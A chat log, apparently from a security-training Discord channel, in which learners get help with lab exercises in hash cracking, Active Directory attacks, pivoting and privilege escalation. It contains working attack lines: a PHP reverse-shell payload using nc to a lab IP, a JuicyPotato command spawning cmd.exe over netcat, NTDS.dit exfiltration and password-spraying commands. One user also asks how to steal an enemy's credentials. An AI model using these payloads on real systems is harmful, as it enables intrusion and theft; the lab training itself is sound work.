#modules

Reading comprehension is important

I'm at a loss to know how to tackle the module problem by cracking passwords with hashcat After decrypting the NTLM password hashes contained in the NTDS.dit file, perform an analysis of the results and discover the MOST common password in the INLANEFREIGHT. LOCAL

Well, use the technique to obtain the passwords from that file, and then just see how many passwords are the same, hashcat has an output file mode

I have done it this way as such and it has deciphered me but now I have the problem of not knowing how to make it tell me which one is repeated
-->hashcat -a 0 -m 1000 hash12 /usr/share/wordlists/rockyou.txt --username hash12

you're missing the rules

You'd need to analyze the output

hashcat rules are the most powerful feature of hashcat and will make your cracking time so much faster 😄

That's not what's being asked here

For ZAP Fuzzing with cookies, I have the select all the line?

And since I have the passwords now I need to know which one is repeated 5 times to get the answer

Not necessarily just 5, but the most

Nvm I just did not go into response 🤣.

Skill issue

I've narrowed it down a bit. I'm either doing something wrong in my payload or my netcat listen command. I know have remote code execution because my 'id' prompt works but I cannot get the reverse shell to connect

i solved all the question but for one for the Windows Privilege Escalation Skills Assessment - Part I, im stuck at the first question Which two KBs are installed on the target system? (Answer format: 3210000&3210060). i cant seem to be able to find it a dm or hint on how to find it would be nice

Try using /bin/bash instead of /bin/sh

https://www.partitionwizard.com/clone-disk/how-to-get-a-list-installed-windows-10-updates.html

ohhh thats what it meant... thank you so much

still getting the id but no connection. My netcat just eternally says <listening on [any] 9443 . . .>

When you changed it you uploaded a new one, yes?

yes

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>

This syntax yeah?

Also if you're adding a line of code you don't need another <?php

You just add the new command after the semicolon

yes, though my tun0 ip is 10.10.14.247 specifically

I was just asking about syntax

You can replace the whole line with the ID command with that new php code

Should there be any issue with this payload?

I think it the same error

i had this error before when i hadn't changed the key perms

or maybe just similar to it? im sure its was permission denied tho

Remove the space between the system and the ( in the second part

When your key isn't formatted right it yells at you about it

no luck, still just listening

i see

and you're running the listener before you pull the page yeah?

because if you do it after, it's not gonna connect

yep

replace /bin/sh with /bin/bash

I have, that's what I just uploaded and tried

Hello, why my pwnbox is not accepting some of my keystrokes? I mean, everytime I tried to use the free terminal it doesn't let me write anything inside the terminal. Well some of my keystrokes are working, like: "n", "9", ":", "/". and the rest is not working😕

works on my machine

do you mean the integrated terminal?

just use the full vm the integrated terminal is buggy

ok, I'll try it tommorow. Thanks!!

or alternatively: set up your own vm

I'm using a vm with Parrot OS. I'll try the pwnbox that way I know if I'm missing something in my vm

¯_(ツ)_/¯

could be a UFW setting in your vm

because if you can interact with the box you're at least connected to the vpn

Currently working through "Linux Fundementals", and I'm not sure if I missed something or if I'm mistaken but the questions listed under this section about Filter contents have nothing to do with what I've learned thus far and what was covered in the section? I looked up the answers and they had nothing to do with anything I've learned thus far?

Anyone Know how i Get Email And Password from My Huge Enemy that Destroyed my Life?

you gotta do a little bit of searching around

but they do relate to the commands listed in an earlier part of the module

I'm having tons of issues with the Attacking Common Services Skill Assessments. I get this error when trying to hydra. I cant crackmapexec. I've tried terminating the VPN multiple times, I've tried switching VPN. Any recommendations?

May I DM you screenshots of what I'm seeing? I'm being asked questions about using cURL which I've never opened, let alone used.

no

curl is a fairly standard linux tool

don't attack ssh

why do i get this error : (node:35281) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
[35281:0313/152417.303700:FATAL:gpu_data_manager_impl_private.cc(445)] GPU process isn't usable. Goodbye.
zsh: trace trap proxychains bloodhound

when i ran bloodhound with proxychains

Yeah, I ran the wrong command. But I still cant connect to the target

why are you running bh with proxychains? run it in your own vm

I can't even nmap

"can't connect to target" it's saying can't connect via ssh

netexec/cme works better for rdp

when i ran it and put the creds of domain user, its says invalid

what?

the neo4j login page?

any tool for bruting a locked file on linux

Thanks, worked much better.

here's the thing i wanna use bh, i wanna ran bloodhound-python to get *.json using a domain user cred which his machine is not accessible to my network , so i gotta pivot right?

after getting the *.json files i should normally start neo4j and issue the command proxychains bloodhound after

bloodhound-python is very different from bloodhound

bloodhound-python is a collector, bloodhound is the graphing tool

yes

i just wanted to let you what i did

there's no need to proxychains bloodhound, run it in your vm locally

and what should i put as the database

that bolt://localhost:xxxx

whatever your default credental is

it should be given in the module

hi everyone 🙂 I'm stuck on the skills assessment for the introduction to whitebox module. Is anyone willing for a nudge? I'd be forever in your favor 🙂 I'm having some trouble with the authentication

...

again, bloodhound-python is very different from bloodhound
bloodhound-python is a collector, bloodhound is the graphing tool

bloodhound-python will need to connect to the DC to collect data

wait

and its says invalid rn

in simpler terms, bloodhound-python is a tool used to collect information from active directory, after that you take those files it's collected and put them into bloodhound which is an app that runs locally on your machine and shows you the results of that information collected.

yes i know the difference , my problem is that bloodhound doesn't work

oh wait i may have confused things with the lab, all i need is the data collected by bloodhound-python that can be ran with proxychains to get data and then log to bloodhound with my own creds i set up?and upload it ?

you don't need proxychains

you just collect the data with the python tool and then dump that data into bh

depends on what you're doing you might need proxychains

but how will it work if it needs to connect to DC first

if you don't have a direct route to DC

yes, but he doesn't 'need' it

i need proxychains in this case no?

that's why i said just collect the data, if tha forces him to use proxychains to do that, that's fine

but one way or another he needs to get that data to his machine or the machine bh is running on

i don't know because i don't know the module, i'm just telling you what the tools do and how you use them together

then you shouldn't say you don't need proxychains if you aren't sure

yes that's what i've been trying to say and i confused the matter with bloodhound , bloodhound doesnt need proxychains

you may need to pivot through 318 machines before you get that data, i have no idea of the context

if i can get the data i can ran bloodhound

xre0us i'm just explaining those two tools. him not answering the specific method on how he needs to do it for his particular module.

so in the context of my answer, no proxychains is not required

if his particular engagement requires it, obviously he needs to use it then

here's the thing: your answer can be construed as not needing it at all

that's the point that was being made

right, he asked if he 'needed' proxychains to use it, i don't want him to think in the future he will require it every time

I am stuck for a long time in the AD Enumeration & Attacks module Skill assessment I on the last question. I have the creds for ||tpetty|| but I cant use them to RDP as this acc, or open a shell under its context with runas, for example (or runascs). Any nudge would be highly appreciated!

you don't need to rdp

do it remotely or from a previous compromised host

sls

I'm stucked for days in Broken Authentication - Predictable Reset Token Question 1, can anyone give me a nudge? I'm open to DMs.

I'm not sure if I'm doing something wrong with my milliseconds or my script, so anyone can look into it and give me advice?

Broken Authentication - Predictable Reset Token Question 1:
3 things:

• you'll need to try a request every millisecond for +/- 1 second, so total will be 2000 requests
• the server is in UTC, you'll need to convert to that
• make sure the string you used to generate the hash is correct, check the openmeeting php code

Module: WINDOWS PRIVILEGE ESCALATION
Section: Pillaging
https://academy.hackthebox.com/module/67/section/1637

Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer

Restore a Backup with ID gives me nothing. C:\Restore\C\Windows\System32 folder is empty. What am I missing?

almost everyone of us 😄

CPTS 10000% , even if it long it will help you tremendously comparing to pnpt which cover only AD and and it is easy compared to CPTS, i did PJPT , im not deny that it was a fun experience as i was a complete beginner but CPTS is just goated

learning so much stuff deeply

lmao deleted msg as i was replying

sorry I realize I posted in the wrong spot

posted in CPTS channel

hello im in the AD skills assessement II on the qst : Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

i thought of creating a list of all domain users and then start password spraying with weak cpasswords but im having problems on getting all domain users

there's 2000+ users , is there any way to get all those without losing much time or my approach wont work in this qst

netexec can do it, the AD powershell module can do it

thanks !

use nxc ldap will be a lot faster to get a userlist compared to the other protocols

the domainpasswordspray.ps1 wont work

can't import it

in a linux or windows host

from your attack host

nxc can both get a userlist and password spray

same as kerbrute right?

Ah, that probably is my issue. I'm probably converting from an Asian timezone

Does the date time provided by the module, in UTC? Or it follows the user's timezone?

kerbrute doesn't generate a userlist, but password spraying with it will be faster

it should be in UTC, but when you convert that timestamp into epoch time, it will use your timezone instead

https://docs.python.org/3/library/datetime.html#datetime.datetime.timestamp
Naive datetime instances are assumed to represent local time and this method relies on the platform C mktime() function to perform the conversion.

i see , i understand

but whats the full syntax to generate userlist with nxc ldap ? domain user list

nxc ldap <target> -u '' -p '' --users --log $(pwd)/users.out

you'll need to clean up the output to get a list you can pray with

cat users.out | python -c "import sys; [print(line.split()[9]) for line in sys.stdin if line.strip() and len(line.split()) > 9]" | tee users.txt

alriiightyy thank youuu

but what is nxc? netexec?

yes

i see, let me adjust and wait for 2k requests

ngl that question is the only one left on my entire broken authentication module

yeah seems to have tripped a lot of people up

Might be missing something here but - Trying to use FFUF for "Brute Forcing Usernames - Broken Authentication" instead of using WFUZZ but I can figure out how to filter something like "Invalid Username" in ffuf. Idk if I'm having a stupid moment here - Anyone got a tip here?

hello i've done some forwarding to attack the mysql remote service using the csv file of all the default connection information. it's been 1h i'm brute force i'm on the right track or do i need to look somewhere else?

https://academy.hackthebox.com/module/147/section/1328

you don't need to use a tool to bruteforce

as the cheat-sheet contains a lot of extraneous default creds

you can just manually search the cheat-sheet for mysql and use the small handful of creds to find it

it will be loads faster

Please 🙏🏻

https://tenor.com/view/bocchi-the-rock-bocchi-nijika-anime-girl-please-gif-3998427045057487325

Oneigaishimasu

i was gonna help, but saw you're a weeb

so i changed my mind /s (I haven't done this module)

https://tenor.com/view/yuriyuri-lol-lmao-laughing-anime-gif-9214538

based

are you sure you're restoring the right snapshot

alternatively

hidden files

You mean filter out any responses that contain those words?

Should be just -fr „Invalid user“

Yup restored all 4 snapshots, yet nothing

Anyone do the "Password attacks lab - hard"? I'm struggling with the vhd file

What about it?

Yeah It's not working.

It's just returning all of them -

Accessing it. I think I have it mounted. When I try "cryptsetup bitlkOpen" it requires a passphrase but doesn't work with the passwords I have. Tried to bitlock2john it to see if I can crack the password that way but john doesn't recognize it.

i try it this cred but he doesn't work :/

one of these is in-fact correct

should be able to bitlocker2john it then crack it

you put the output of bitlocker2john into it's own file

and if you curl it you are sure that exact phrase is part of the response without any html stuff between?

Just tried both but says no password hashes loaded

you might need to run bitlocker2john with python2

otherwise i think it breaks

Didn't get any errors but will try python2. Is it the whole vhd file or jsut the partition?

the whole vhd

you don't run bitlocker2john on a partition

bitlocker2john requires a file input

Was missing a -i flag this whole time 💢
Thanks for your help

thx a lot he works but it's strange because i use this there are shortly before and it didn't work

you were likely using bad syntax

Module: BLIND SQL INJECTION
Section: Out-of-Band DNS

I've resolved this exercise using the internal custom DNS record as described in the module. However, I had some comprehension questions if anyone has any insight:

1. Presumably, we cannot use Burp Suite Collaborator or the https://app.interactsh.com/#/ service because either would require external network connectivity and the instance cannot make DNS calls to the internet to perform the attack.

2. The section lists towards the end of the Custom DNS record portion that, "As we are using a custom DNS domain and have access to the DNS server logs, we do not need to setup another listener like interact.sh to capture the logs (though it is still an option)"

I'm interested in understanding the point they're making in bullet #2. I'm assuming they're referring to pulling the Git repo for interact.sh and running that service. Has anyone been able to perform the exercise this way? Am I understanding this right?

Just from what the statement says, it says you already have the logs so you don't need to setup a listener to obtain those logs, however if you didn't have access to the logs already setting up another listener is a way to obtain them.

as for using the tool, i haven't used it so not sure about how you configure it or the syntax

Okay, I think I follow. The statement isn't referring to internal/external activity, but ability/inability to read logs.

That makes more sense when I read it.

right it's saying you already have the logs so you don't need to setup the listener

Update - I'm a dipstick, it was using GET not POST

derp

hey everyone, I am currently stuck here. https://academy.hackthebox.com/module/112/section/1079 I know from the hint that I need to investigate Sql management studio but I am struggling to get it run on my kali vm

You don't run sql management studio from your machine

You must first find a way onto the box: from there things can become clearer.
Step 0: enumerate

rdp?

Thats for you to figure out

ok

Always enumerate your target first. Which is what this module is all about

yes, i ran nmap against it

Then use the knowledge and tools from the module to help you move forward

trying

Two remain

the quality of these modules has vastly exceeded my expectations

i think the top 3 as of this point are Understanding Log Sources & Investigating with Splunk, Introduction to Malware Analysis, and Introduction to Digital Forensics

these three modules are organized neatly and have a vast wealth of information with lab exercises that make you really think outside the box

the skills assessments are done well, testing your newfound knowledge and analytical skills

i can't wait to see what Detecting Windows Attacks with Splunk will offer

hello im on qst 7 of AD skills assesseent II : Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

i got the creds from the config file and when i try to log in via mssclient.py it doesn't work for some reason

how can i use the spoiler tag on an image? i dont wanna spoil to show my command and the output of it

there's a little eye button on the image when you select to upload it

you'll want to make sure you're inputting the user/pass correctly, so maybe don't copy/paste it. beyond that, if it's not working, it's very likely a red herring or creds for another service

you may need to enumerate more

one thing i've noticed in the modules is there are red herrings

the thing is that i already ran the command before for other challenges

do you mind if I dm you? I still haven't gotten the required flag :/ im not sure what to change on the script anymore

shells and payloads live engagement.

the parrot foothold box is not connected to the internet and has no webbrowser

so how do i upload payloads

and browse the sites? also i cant nmap because its not a su account

cant sudo either

there are a myriad of different tools you can use to transfer files

scp, ftp, smb

but i cant uplooad files to the site

liek this hint

i cant access the blog because ** there is no webbrowser**

dm me your script

and i cant nmap because i cant run sudo

so you're on computer a, and you want to transfer a file to computer b? or what?

you can access the web browser iirc

i have to remote into the foothold box. that ONLY has access to the 172.x.x.x network. outside pcs do not. im "supposed" to enumerate the ips and upload webshells etc. one is supposed to be a war file upload to get a shell. another ip is ablog im supposed to browse. but i cant becasue i cant nmap and i cant accessa browser

where lol when i look it up theonly one is tor and it wont connect

it's times like these where it's necessary to suffer

you could do ssh tunneling

wow i've got a web browser on the foothold!

which one

firefox

wot i searched and it didnt come up

wtf

just type firefox in the terminal

can someone help

[-] ERROR(SQL01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

SQL Server supports two authentication methods, Windows authentication and mixed mode. Windows auth is auth via Windows/AD, while mixed mode supports Windows/AD auth and the SQL Server username/password pairs to log in.

sounds like you might be using the wrong authentication method, but idk because i have not done that module.

your error message indicates it's a problem with integrated authentication

well im in an ad env so i should use windows-auth

right?

nvm i used sqlsh and worked

depends on how the sql server was setup

walkthroughs

Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer.

I use nmap to scan and got the result Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: nix-nmap-easy | NetBIOS computer name: NIX-NMAP-EASY\\x00 | Domain name: \\x00 | FQDN: nix-nmap-easy |_ System time: 2023-06-25T13:16:13+02:00 Why the answer is Ubuntu instead of Window

SMB is primarily a Microsoft Windows protocol (it was designed to run on NetBIOS)

that's why you see Windows there

some other telltale signs:
the OS that nmap detected (if it's a Windows machine, it's highly unlikely that there would be any mention of Linux)
the computer name (nix is short hard for Unix, signifying a Unix-based system)
the lack of a domain name (if not domain-joined, it would most likely say \\WORKGROUP)

which cert does this fall under? I don't believe it's under CPTS right?

CDSA

nice

Does anyone knw how to transfer the KeePass file to our pwn box in the password attacks hard section

in my kali vm gobuster wasn't installed and tried to install it regularly had issues so opted to do update && upgrade only to realise my library blocks access to kali.org lol. Any workaround to this apart from using VPN?

??

why they dont have CDSA thread in the discord :))

#cdsa

thinking of doing bug bounty hunter path after soc analyst

? Anyone any clue ?

???

Do I have to get VMware pro to take a snapshot or is there another way?

nibbles box is unstable AF? anybody experienced the same?

If you're on Windows and are using VMWare, just take the screenshot from Windows... ez

Sorry I meant more like a backup of my current OS configuration rather than a picture.

you can compare them on their website: https://www.vmware.com/products/workstation-pro.html just hit compare

looks like you do need pro for snapshots

I am at Module: Password Attacks, Section: Attacking Active Directory & NTDS.dit. Has anyone encounter being unable to copy the NTDS.dit over to the attacker machine even after setting the SMB server on attakcer machine, and executing this command "cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit", using the Evil-winrm terminal line.

firstly, did you make a directory called NTDS in C drive?

You are referring to the C drive on the attacker machine right

yeah

Yes I created a share called NTDS

the command you wrote wouldn't transfer it to your attacker machine, looks like it's trying to copy it to the c: drive

are you trying to transfer the the file over or create a copy of the ntds.dit file?

Oh now that I look at it, it just seems that I am just copying NTDS.dit from its original directory to C:\NTDS

I am trying to transfer the file over to attacker machine (linux)

the easiest way i've found to transfer files from windows to your kali box is by using an smb server. use smbserver.py to create a smb share, then in your windows machine you can just navigate to the share folder and copy whatever you want to it

okay then you can set up your smbserver and use

copy C:\NTDS\NTDS.dit \\<IP>\<sharename>

Ok I understand what you guys mean now

easier than that, you setup the smb server and you can just open it in explorer

but yeah that works too

Xfreerdp is not available haha, so only through terminal

I think he is on winrm session

ahh yeah

copy it is then

Thanks @soft cedar @cloud urchin for the help

what should I be looking for when trying to find the domain of an SMB client? i've tried nmap, enum4linux, rpcclient. cant seem to find any information about the domain

namp usually has it

tried -sV and -sC can't find anything with domain info

is there a website you can connect to and look around?

nope ;c

try smb-enum NSE script with nmap

that's an smb enumeration script

maybe try a diff one?

@novel hinge

You can use crackmapexec / ldapsearch

crackmapexec smb <IP> : should find the domain name.

@soft cedar kk let me try that, dont have cme downloaded on my machine

Is anyone able to help me out with the Advanced XSS filter bypass section? I'm able to bypass the filter successfully, but I can't seem to get an admin to view the exploit.

"Secondarily, in this attack the attacker might be attempting to cloak their address with a decoy, but the responses for multiple closed ports will still be directed towards them with the RST flags denoted for TCP."

Arent the RST responses sent to both decoy ips and attackers ip , since responses are sent based on the source ip address of the requests. why the above line from htb stating that no matter what decoys attacker is using the responses are sent to the attackers ip ? Am i wrong ?

Hello everybody thanks for the previous help you give me. Currently I am stuck in the section "Privileged Access" in the "Active directory enumeration & attacks" on the exercice n°3 "Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt." I used xfreerdp to connect and after used the tool "Get-SQLQuery" and it's work but I would like to execute the script "mssqlclient.py " but the windows machine don't contains python installed and from my kali I cannot access directly to the ip address of the SQL machine (10.129.230.228) do you think I need to used "chisel" or other kind of tools ? Thanks

cme smb did not work trying to find the domain, i already got the fllag and been stuck on findingg this domain for 1hr ;c

did smb-enum-domains.nse not work either?

What are you trying to do?
Is it a module / box?

Yes, you’ll need to pivot in this case.

that didnt work

but i ran enum4linux and it worked i think i was just tireed and overlooked it

thank you guys for your help so much, iddk why that took me so long

ty human god and 0x5

there are windows tools that can communicate with sql, like sqlcmd

Do you recommand a tools for that ?

Yes I did but when I execute the command EXEC sp_configure 'xp_cmdshell', 1 it's not working

ligolo-ng makes the whole process easy

Thanks

I think it’s EXECUTE not EXEC.

thanks

repost from #858470491676737536 :
henlo pals. i hope this is the right channel for this. can someone fill me in on what the issue is here? i figure its a vpn issue, but not completely certain. this happened on Module: Network Enumeration with nmap , Section: Firewall and IDS/IPS Evasion - Medium Lab i spent like 6-8 hours banging my head against this simple exercise only to discover this was the problem. it is also affecting me now on the Hard Lab as well. i get two completely different scan results from the same target depending on the machine i am using. i am worried this will affect all of my Labs in the future. seems like a big-ish deal to me. any advice is appreciated.

Raise it to support and please mask the command

thanks i'll delete the screenshot and make a new one.

I'm working on the skill assessment for the Windows Attack and Defense module. I have completed the attack but I can't find any logs under the Id 4886 or 4887

Just use mimikatz. I moved mimikatz to target machine and got the answer

do i have to do anything with runas /user:eagle\rocky cmd.exe? I dont think so but just to be sure

Can anyone please help me here? It is the last module for me...
in Attacking Enterprise Networks - Post Exploitation Im trying to double pivot using ligolo-ng. It works fine, but when I ping - 172.16.9.3 for example - no answer...
Also when I tried to add a new route: sudo ip route add 172.16.9.0/23 dev ligolo2 - I get error that Error: Invalid prefix for given prefix length.. So I added /24 instead but that probably not right...

ip route doesn't like cidr notattion, also you'd add the route 172.16.0.0/23

for routing you add the route host (in this instance 172.16.0.0)

Hello how to capture login password with Wireshark ? plz

So like that: sudo ip route add 172.16.0.0/23 dev ligolo? that doesn't ping 172.16.9.3 either...

well here's the other part to that issue: does the device you're trying to forward through have access to that network?

in ligolo you also do need to connect to the session (aka start) that has the appropriate routing

yes I connected and started using another toute (double pivoting)

¯_(ツ)_/¯

i'm sure someone with more knowledge than me can answer it

but bear in mind many people do the module blind

I use 172.16.8.3 to access 172.16.9.3. right?

that i can't answer

i haven't done that module to be able to tell you

idk if that network is segregated instead into /8 or what have you so the host bits are 172.16.8 and 172.16.9

You can see in ligolo - the ip range is /23..

separate interfaces btw

also that ip is the other interface on that device

Yea.. I want to access 172.16.9.25. Now I can only access 172.16.8... but not 172.16.9.. even though I added double pivoting and I can see that the interfaces changed to that second machine...

add another route specifying 172.16.9.0/8 or /16

see if that reesolves

https://www.hackthebox.com/blog/active-directory-penetration-testing-cheatsheet-and-guide Nice article

Didn't work. never mind.. thank you anyway, I just really wanted it to work with ligolo-ng..

Module: Password Attacks, Section: Credential Hunting in Windows, does anybody has issue transferring over Lazagne from attacker to target, and after transferrring Lazagne to target, has trouble executing the lazagne.py file because target does not have pip or python.

use the exe? https://github.com/AlessandroZ/LaZagne/releases

there's a LaZagne.exe

yup managed to solve it

Any hint on broken auth skills assessment? I found all support account and their password, also decoded and understood how cookies work but cannot obtain privileged account... Now Im trying to find any admin* account via message.php. I got an hint from the register form it say invalid prefix when I try to create a user with name admin*, am I on the right path?

I GOT IT

🥳

Guys need some help with this question from Skill Assessment "INTERMEDIATE NETWORK TRAFFIC ANALYSIS"

Inspect the funky_dns.pcap file, part of this module's resources, and enter the related attack as your answer. Answer format: "DNS Flooding", "DNS Amplification", "DNS Tunneling"

My answers: "DNS Tunneling", "DNS Enumeration"

What am i missing ?

2 things:

1. understanding how DNS flooding and DNS amplification attacks work will help
2. knowing what patterns to look for in the traffic that are indicative of each attack

also, DNS Enumeration isn't an option.

Oh I thought they were given as examples

Thanks

need help on AD SKILLS ASSESSEMENT II : Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

got a revshell but can PE

can't

there were that seImpersonate enabled but its was not covered in the module till windows PE

so i probably should try smth else but im stuck

why not try it

you can find different ways to the flag

i tried

but everything failed, used printspoofer but a cmd of admin popped up and then i get back to my ps session with low privilege

also tried juicypotato which resulted in an error while execution

juicypotato will work, try different CLID

the command is ||.\JuicyPotato.exe -cmd "C:\Users\Public\nc.exe -e cmd.exe 172.16.7.240 4040"|| right?

https://github.com/ohpe/juicy-potato try different CLID

wait what's that , i just followed a medium blog about SEimpersonate since i was frustrated but none of them talked about clid

when using juicypotato

how do you specify clid?

read the docs

lmao

this part is suck , why would they put something wasn't covered before

it is technically covered https://academy.hackthebox.com/module/143/section/1276

i think im blind since i dont see it

because it's in this section https://academy.hackthebox.com/module/143/section/1275

I'm just at this stage now. It took me so long to get the rev shell right

im stuck there for 1 day rn

just got the revshell and struggling to get system lvl

yes but

it wasnt technically covered , its more like a what you can do , and you'll be able to do one you reach windows pe

I'm currently the password attacks lab hard I wana transfer a keypass file from a windows machine onto my pwn box I try to setup an smb share and transfer it didn't work any clues ??

do some of these labs work better on parrot os vs kali? Has anyone noticed a difference?

I don't think you even need to set a clsid, can't remember

what's the error

nvm

i used printspoofer with ncat

and go the system shell

i think it was something with commands , i just gave up on it and went with printspoofer instead

What are some other options to use in a nmap scan other than -Pn to get past host seems down. I've tried decreasing the speed and use random ip addresses however I still get a host seems down message. I don't seem to get the full out put when I use -Pn so I try to avoid using it. Could it be because I'm running a vpn in the background there's a connection issue or something?

even -T3 -D RND:5 --source-port 53 won't allow me to scan the ipaddress

are you able to ping the host? Or get other responses from the host?

-Pn doesn't send an icmp echo request, which some devices don't allow a response to by default

just did footprinting medium lab! is my fav till now time to go for hard

maybe you got flagged by the firewall at that point?

Yeah that's why I try to avoid the -Pn option but I'm not getting a response otherwise

Disabling arp is a good thing to do as well

You're gonna use a multitude of techniques, RND was never needed for me

--disable-arp-ping hasn't worked either unfortunately. I've been getting away with just using -T4 but this lab isn't letting me do that this time

should I just regen the target?

Any one knows how to use XXEinjector tool

-Pn --disable-arp-ping i used if i remember correcty. with other commands ofc

the -Pn option does work I know that but doesn't give me the output of -sV -sC when using it only the ports

Try resetting the box and trying again

If you got blocked, then you're gonna be getting nothing

Regardless if your command is right or not

^

okay

And the timer is like 5-10 minutes iirc

Idk i never tripped it on accident

just reset the target, its faster

whats the best way to scan these boxes? my nmaps going slow AF on HTB machines i've been dealing with it for most part but really want a detailed scan for skill assessments and its like 1% a minute

I'm still stuck. I can get a shell with PrintSpoofer which I assume is supposed to be the one that has the privs to get the creds but the shell doesn't do anything

I have a payload ready to go just need that shell to work

don't do a service or script scan; instead with a full-port scan add -T4 for a slightly more aggressive scan timing which lowers the max retries and max timeout time for scanning ports

my Default is -A -T 4-p-, i know -A slows it down hella bad but even withoutt it still takes ages

add -sT

which forces it to do a TCP scan instead of something like a Syn Scan

did you follow the instructions from windows pe module ?

or just a blog online

if you set up printspoofer with netcat you should be able to get a good system rev shell

Alright let me see this module. It has to be close

I have a issue with white box testing, an error said "code injection should not be possible, even without sanitization or validation", but the only time i use the inputs its is here ```js
console.log(type,"password - length",length,':', password);

just the SeImpersonate section

its short and easy

im stuck on the last 2question rn

Any idea why is that ? I don't get it why it dosn't work.

hello guys i need help,

module: Using Metasploit Framework
section: MSF Sessions - Sessions&Jobs

myproblem: I got into the machine but I can't find the right payload to increase my authorization.

link-> https://academy.hackthebox.com/module/39/section/415

can anyone help me on BROKEN AUTHENTICATION Predictable Reset Token, question 2 was easy but i cant figure out question 1

Right yeah that's exactly what I did and I get the shell but it just stays blank

well according to the question, an old version of sudo is running - so search that

Maybe I got some dodgy binaries

there's ways to find the version of something, usually -V or -v

can you do whoami?

weird

I used a few nodules but it didn't work.

Nothing at all, it just says it caught the shell and then stays blank

the lab brokes btw

its broke 3 times for me so maybe its broken

first in the shell try and find the current running version of sudo on the system

I wonder if its cause I downloaded nc64.exe instead of looking on the machine for an exe

Will have a look

And... My own box died

yes happened to me lmao

i need help to get to DC01
i have the genericALL right
i tried to use it to get the dc01 admin but i dont know how
i tried to change the admin password but it changed the admin of ms01 not dc01

'submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host."

idk what im doing wrong

its work thx

thx for your feedback, i had the same issue with the fact that it shouldn't crash which is weird, A hint tells you to throw and error when condition are not met. anw thx

Just as bad 😦

Okay, I switched nc versions and I got the real shell

sounds like you might have some connection issues

nvm

lets goooo

https://academy.hackthebox.com/achievement/386037/143

this module was sooooo fun ngl but the skills assessment made me lose time over stupid thing such as getting rev shells,googling,transfering files

gosh i love htb, i learned a lot

Finally got that system shell. Ye haww. Just before the kids get out of school

Always have hella ping times on these boxes, swapping vpns/servers does not help. ms is usually mid 50's for the server i pick

well these wildly inconsistent ping times would explain why it takes a long time

try doing it from the pwnbox (turning off your vpn first) and see if the issue persists

it happens when the target just spawned, give it a few mins to stablise

also the ms sounds like pwnbox server not vpn region

vpn-region would be (Us/EU)-academy-(1/2/3)

box has been spawned for awhile, -A nmap has been running for 51 minutes at this point lmao

the US EAST/US WEST/etc.. are pwnbox regions which are completely separate

I have a doubt anyone knw how to transfer a keypass file onto our pwn box I tried using a share but it didn't work in the password attacks hard lab

@ember coral I take it this image reflects what you're meaning by "my ms shows as 50 ms"

xfreerdp has the /drive: option

Honestly not sure where i remember seeing it, just went in and downloaded a new VPN trying US Academy 3 instead of 1 and dont see it, but remember seeing it somewhere lol.

you were likely seeing the pwnbox connection speed

which is what my screenshot is displaying for me

the vpn speeds don't have a connection time visible

ah yeah your right i see it now on pawn box. I perfer not to use the box but i cn do my scans there and work from machine if needed i guess.

this at least partially proves that you're doing the right things

lol

hey y can't i txt in general l

Because you need to follow the instructions in #welcome

This might only be me but i read the modules but the questions seems like it has nothing to do with them. Rn im doing filter contents and i dont understand a single question what it wants me to do.

i look up what i have to do on google but i need root perms to access all the ipv4 services but seems i cant get root access when on target

Sudo works just fine

when im on my vm ssh to target i cant get sudo to work

Wdym can't get sudo to work

sudo command then input the user pw if prompted

sudo netstat -tunleep | grep -v "127.0.0" | wc -l
htb-student is not in the sudoers file. This incident will be reported
0

Hmmm so I switched to my parrot os vm and running locate gives me a command not found error is that normal?

I know how to fix it just wondering if thats normal

also mssqlclient.py seems to not be on there but I'm sure it's on my kali machine

You shouldn't need sudo for netstat

You might need to do sudo apt install locate

Yeah I did the real issue was parrot os doesn't have mssqlclient for the lab and I couldn't figure out a way to install it since I didn't see it in any github repository

It does

And mssqlclient.py is part of impacket

I checked there and it wasn't in there

ill show it

It'll be under impacket

I can assuredly say it's there bc it's on mine ¯_(ツ)_/¯

Well shit I found it lol my bad, I ran locate and it didn't show it

Locate can be dumb

worked on my kali machine interestingly enough

But if it autocompletes, it exists is my general rule of thumb

I'll give parrot another try lol I gave up to easy

why cant i access general

like chat

how can i access general

like chat

.

when can i acces general?

like chat??????

#welcome @rustic sage

No need to spam

hi

@analog dock how can i access general?

Read the damn channel

#welcome

I am in attacking common services: DNS. I have ||enumerated the subdomains using subbrute and have found a flag in the TXT records of one of inlanefreight.com. It is not working. I am assuming it is a leftover flag from another exercise? Where does it want me to go get these flags? Maybe Dig is not the right tool for the job on this one.||

Please help

Go to the welcome channel and put in your htb credentials in the bot command channel

Not credentials, just account identifier

Which is found by following #welcome

Mb what MarcieLee said

Ooi

Done with Footprinting module , SSH was hella slow

Because you're meant to go after inlanefreight.htb

I knew it

Wrong site entirely

Working on that module now definitely has taken me longer than 2 days

Tonde gemar join discord

whole module? or only the 3 labs at the end?

I always spend all the time on the module and dont read the question well lol

Help me

With?

Thanks

The whole module some days I didn't do it because of college work taking my priority and I spend a little extra time taking notes

I've got 2 more to do then then the 3 labs at the end

oh yea the whole module takes some time.

good luck! medium was my fav and on hard the only "hard" thing was getting the foothold

Sounds like ssh stuff interesting 🤔

ssh is somwhere before the end before you get the flag

dont attack ssh service

Okay bet

it gives me premission denied when i do it withour sudo

i cant access the website in windows on htb academy

is this like only possible with VM

cuz kali and C# are uh uh so its best to do it in windows

cant find the solutions to these questions. I have read everything but cant find anything that has to do with this

I mean what have you tried

